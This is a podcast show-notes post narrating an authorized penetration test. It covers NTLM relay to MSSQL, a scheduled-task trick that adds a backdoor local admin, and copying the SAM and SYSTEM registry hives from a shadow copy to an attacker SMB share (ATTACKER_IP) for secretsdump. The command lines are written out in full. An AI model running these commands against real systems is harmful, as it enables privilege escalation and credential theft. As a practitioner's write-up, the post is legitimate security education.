7MS #692: Tales of Pentest Pwnage – Part 76

Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else:

I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/.

I relayed the DA account to a SQL box that BloodHound said had a "session" from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance".

Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy.

In the end, the bizarre combo of things that did the trick was:

• Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!'
• From the victim system, I did an mklink to the shadow copy: mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123\
• From command prompt on the victim system, I authenticated to my rogue share: net use \\ATTACKER_IP\share /user:toteslegit DontMindMeLOL!
• Then I did a copy command for the first hive: copy SYSTEM \\my.attackingip\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed!
• I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!!
• Finishing move: secretsdump -sam sam.test -system sys.test LOCAL